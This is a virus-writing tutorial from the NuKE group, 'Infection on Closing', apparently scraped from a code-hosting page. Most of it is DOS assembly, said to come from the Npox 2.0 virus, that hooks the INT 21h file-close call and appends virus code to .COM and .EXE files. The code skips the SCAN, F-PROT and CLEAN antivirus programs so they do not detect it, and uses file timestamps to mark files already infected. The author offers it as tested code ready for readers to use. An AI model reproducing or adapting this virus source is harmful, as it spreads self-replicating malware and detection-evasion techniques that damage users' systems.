256 lines
20 KiB
Plaintext
256 lines
20 KiB
Plaintext
****************************
|
|
** Infection on Closing **
|
|
** **
|
|
** By Rock Steady/NuKE **
|
|
****************************
|
|
|
|
This routine goes out for a few people that had trouble hacking this
|
|
routine themselves... I kinda like it, its my very OWN, no Dark Avenger
|
|
hack, it is VERY straight forward, and kinda simple...I was not going
|
|
to put this here, but since I `Promised' people and left them hanging
|
|
with `Wait for IJ#5, I guess I owed you it... huh?'
|
|
|
|
Again this code comes right out of Npox 2.0, its need, simple fast,
|
|
cool, and it works, Npox is your example, I heard MANY MANY complaints
|
|
with other `Virus writing guides' Meaning they explained the code but
|
|
sometimes the arthur himself never check if the code was good, as he
|
|
may have modified it, and not test it... or whatever reason... Anyhow
|
|
|
|
------------------
|
|
Okay once you intercepted the Int21h/ah=3Dh function you make it jump
|
|
here...
|
|
|
|
closing_file: cmp bx,0h ;Handle=0?
|
|
je closing_bye ;if equal leave
|
|
cmp bx,4h ;Handle > 4
|
|
ja close_cont ;if YES ,then JUMP!
|
|
closing_bye: jmp dword ptr cs:[int21] ;Leave, no interest to us
|
|
|
|
The whole point of the above code is that DOS contains 5 predefined
|
|
Handlers, 0 -> 4, Basically, those handles are the NULL, CON, AUX
|
|
COMx, LPTx handles... So we surely do not need to continue once we
|
|
encounter that...
|
|
|
|
close_cont: push ax
|
|
push bx
|
|
push cx
|
|
push dx
|
|
push di
|
|
push ds
|
|
push es
|
|
push bp
|
|
|
|
Our biggest problem is how do we know if this file is a .COM or .EXE or
|
|
simply just another dumb data file? We need this info before we can
|
|
try to infect it... We do this by getting DOS's "Lists of List" this
|
|
will give us all INFO need on the File Handle Number we have in BX!
|
|
and we do that like so...
|
|
|
|
push bx ;Save File Handle
|
|
mov ax,1220h ;Get the Job File Table
|
|
int 2fh ;(JFT)
|
|
|
|
This will give us the JFT for the CURRENT File handle in BX, which
|
|
is given thru ES:DI Then we use this information to get the Address of
|
|
the System File Table!
|
|
|
|
mov ax,1216h ;Get System File Table (List)
|
|
mov bl,es:[di] ;system file table entry number
|
|
int 2fh
|
|
pop bx ;restore the Handle
|
|
|
|
add di,0011h
|
|
mov byte ptr es:[di-0fh],02h
|
|
|
|
add di,0017h ;Jump to the ASCIIZ string
|
|
cmp word ptr es:[di],'OC' ;Is it a .COM file?
|
|
jne closing_next_try ;Next cmp...
|
|
cmp byte ptr es:[di+2h],'M'
|
|
jne pre_exit ;Nope exit
|
|
jmp closing_cunt3 ;.COM file continue
|
|
|
|
closing_next_try:
|
|
cmp word ptr es:[di],'XE' ;Is it a .EXE file?
|
|
jne pre_exit ;No, exit
|
|
cmp byte ptr es:[di+2h],'E'
|
|
jne pre_exit ;No, exit
|
|
|
|
If it is an .EXE file, check if it is F-PROT or SCAN, see F-PROT when
|
|
started up, Opens itself, closes itself, etc... So that a dumb
|
|
virus will infect it, and then the CRC value changes and F-PROT
|
|
screams... haha... Fuck-Prot! is the name...
|
|
|
|
closing_cunt: cmp word ptr es:[di-8],'CS'
|
|
jnz closing_cunt1 ;SCAN
|
|
cmp word ptr es:[di-6],'NA'
|
|
jz pre_exit
|
|
|
|
closing_cunt1: cmp word ptr es:[di-8],'-F'
|
|
jnz closing_cunt2 ;F-PROT
|
|
cmp word ptr es:[di-6],'RP'
|
|
jz pre_exit
|
|
|
|
closing_cunt2: cmp word ptr es:[di-8],'LC'
|
|
jnz closing_cunt3
|
|
cmp word ptr es:[di-6],'AE' ;CLEAN
|
|
jnz closing_cunt3
|
|
|
|
pre_exit: jmp closing_nogood
|
|
|
|
The REST is pretty much the EXACT same on `how' you'd infect a normal
|
|
file, I'll leave it for you to go thru it... The hardest part is
|
|
OVER! Only trick part is, the ending... Remember to Close the file
|
|
and then do an IRET, you don't leave control to dos, as you only needed
|
|
to close it, so do it... OR DON'T close it and return to DOS, as dos
|
|
will close it, just DON'T CLOSE IT TWICE!!!!
|
|
|
|
closing_cunt3: mov ax,5700h ;Get file Time
|
|
call calldos21
|
|
mov al,cl
|
|
or cl,1fh
|
|
dec cx ;60 Seconds
|
|
xor al,cl
|
|
jz closing_nogood ;Already infected
|
|
|
|
push cs
|
|
pop ds
|
|
mov word ptr ds:[old_time],cx ;Save time
|
|
mov word ptr ds:[old_date],dx
|
|
|
|
mov ax,4200h ;jmp beginning of
|
|
xor cx,cx ;file...
|
|
xor dx,dx
|
|
call calldos21
|
|
|
|
mov ah,3fh ;Get first 1b byte
|
|
mov cx,1Bh
|
|
mov dx,offset buffer
|
|
call calldos21
|
|
|
|
jc closing_no_good ;error?
|
|
mov ax,4202h ;Jmp to the EOF
|
|
xor cx,cx
|
|
xor dx,dx
|
|
call calldos21
|
|
|
|
jc closing_no_good
|
|
cmp word ptr ds:[buffer],5A4Dh ;.EXE file?
|
|
je closing_exe ;Yupe then jmp
|
|
mov cx,ax
|
|
sub cx,3h
|
|
mov word ptr ds:[jump_address+1],cx ;Figure out the
|
|
call infect_me ;jmp for .com
|
|
|
|
jc closing_no_good
|
|
mov ah,40h ;Write it to file
|
|
mov dx,offset jump_address
|
|
mov cx,3h
|
|
call calldos21
|
|
closing_no_good:
|
|
mov cx,word ptr ds:[old_time] ;Save file time
|
|
mov dx,word ptr ds:[old_date] ;& date
|
|
mov ax,5701h
|
|
call calldos21
|
|
|
|
closing_nogood: pop bp
|
|
pop es
|
|
pop ds
|
|
pop di
|
|
pop dx
|
|
pop cx
|
|
pop bx
|
|
pop ax
|
|
jmp dword ptr cs:[int21]
|
|
|
|
AS you see the above, we DIDN'T close the file, so we leave dos to do it.
|
|
The bottom is for infecting .exes...
|
|
|
|
closing_exe: mov cx,word ptr cs:[buffer+20] ;Save the original
|
|
mov word ptr cs:[exe_ip],cx ;CS:IP & SS:SP
|
|
mov cx,word ptr cs:[buffer+22]
|
|
mov word ptr cs:[exe_cs],cx
|
|
mov cx,word ptr cs:[buffer+16]
|
|
mov word ptr cs:[exe_sp],cx
|
|
mov cx,word ptr cs:[buffer+14]
|
|
mov word ptr cs:[exe_ss],cx
|
|
|
|
push ax
|
|
push dx
|
|
call multiply
|
|
sub dx,word ptr cs:[buffer+8]
|
|
mov word ptr cs:[vir_cs],dx
|
|
push ax
|
|
push dx
|
|
call infect_me
|
|
pop dx
|
|
pop ax
|
|
mov word ptr cs:[buffer+22],dx
|
|
mov word ptr cs:[buffer+20],ax
|
|
pop dx
|
|
pop ax
|
|
jc closing_no_good
|
|
|
|
add ax,virus_size
|
|
adc dx,0
|
|
|
|
push ax
|
|
push dx
|
|
call multiply
|
|
sub dx,word ptr cs:[buffer+8]
|
|
add ax,40h
|
|
mov word ptr cs:[buffer+14],dx
|
|
mov word ptr cs:[buffer+16],ax
|
|
pop dx
|
|
pop ax
|
|
|
|
push bx
|
|
push cx
|
|
mov cl,7
|
|
shl dx,cl
|
|
|
|
mov bx,ax
|
|
mov cl,9
|
|
shr bx,cl
|
|
|
|
add dx,bx
|
|
and ax,1FFh
|
|
jz close_split
|
|
inc dx
|
|
close_split: pop cx
|
|
pop bx
|
|
|
|
mov word ptr cs:[buffer+2],ax
|
|
mov word ptr cs:[buffer+4],dx
|
|
|
|
mov ah,40h
|
|
mov dx,offset ds:[buffer]
|
|
mov cx,20h
|
|
call calldos21
|
|
|
|
closing_over: jmp closing_no_good
|
|
|
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
|
; Infection Routine...
|
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
|
infect_me proc
|
|
mov ah,40h
|
|
mov dx,offset init_virus
|
|
mov cx,virus_size
|
|
call calldos21
|
|
|
|
jc exit_error ;Error Split
|
|
mov ax,4200h
|
|
xor cx,cx ;Pointer back to
|
|
xor dx,dx ;Top of file!
|
|
call calldos21
|
|
|
|
jc exit_error ;Split Dude...
|
|
clc ;Clear carry flag
|
|
ret
|
|
exit_error:
|
|
stc ;Set carry flag
|
|
ret
|
|
infect_me endp
|
|
|
|
|